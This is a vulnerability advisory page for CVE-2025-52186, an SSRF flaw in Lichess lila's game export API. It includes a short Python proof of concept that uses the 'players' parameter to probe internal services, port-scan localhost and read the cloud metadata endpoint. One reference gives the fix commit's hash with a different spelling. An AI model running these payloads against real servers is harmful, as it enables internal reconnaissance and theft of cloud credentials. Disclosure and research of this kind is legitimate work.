CVE-2025-52186

Description

Lichess lila before commit 11b4c0fb00f0ffd823246f839627005459c8f05c (2025-06-02) contains a Server-Side Request Forgery (SSRF) vulnerability in the game export API. The players parameter is passed directly to an internal HTTP client without validation, allowing remote attackers to force the server to send HTTP requests to arbitrary URLs

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:lichess:lila:*:*:*:*:*:*:*:* - VULNERABLE

Lichess lila < commit 11b4c0fb00f0ffd823246f839627005459c8f05c (2025-06-02)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-52186 SSRF PoC
import requests

target = "http://target-lichess-server/api/game/export/12345"

# SSRF payload targeting internal Redis service
ssrf_payloads = [
    # Probe internal services
    "http://127.0.0.1:6379/",
    "http://192.168.1.1:8080/admin",
    "http://10.0.0.1:9200/_cat/indices",
    # Port scanning via SSRF
    "http://127.0.0.1:22/",
    "http://127.0.0.1:3306/",
    # Read internal metadata
    "http://169.254.169.254/latest/meta-data/",
]

for payload in ssrf_payloads:
    params = {"players": payload}
    try:
        response = requests.get(target, params=params, timeout=10)
        print(f"Payload: {payload}")
        print(f"Status: {response.status_code}")
        print(f"Response: {response.text[:200]}")
        print("---")
    except requests.exceptions.RequestException as e:
        print(f"Error with {payload}: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-52186
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-52186
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-52186/
[4] VulDB https://vuldb.com/cve/CVE-2025-52186
[5] https://github.com/lichess-org/lila/commit/11b4c0fb00f0ffd8232346f839627005459c8f05c
[6] https://hackerone.com/reports/3165242

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-52186", "sourceIdentifier": "[email protected]", "published": "2025-11-13T16:15:51.433", "lastModified": "2026-01-09T15:52:03.223", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Lichess lila before commit 11b4c0fb00f0ffd823246f839627005459c8f05c (2025-06-02) contains a Server-Side Request Forgery (SSRF) vulnerability in the game export API. The players parameter is passed directly to an internal HTTP client without validation, allowing remote attackers to force the server to send HTTP requests to arbitrary URLs"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lichess:lila:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-06-02", "matchCriteriaId": "62D1947A-0E12-4043-A5BC-DD20C8C43E38"}]}]}], "references": [{"url": "https://github.com/lichess-org/lila/commit/11b4c0fb00f0ffd8232346f839627005459c8f05c", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3165242", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}]}}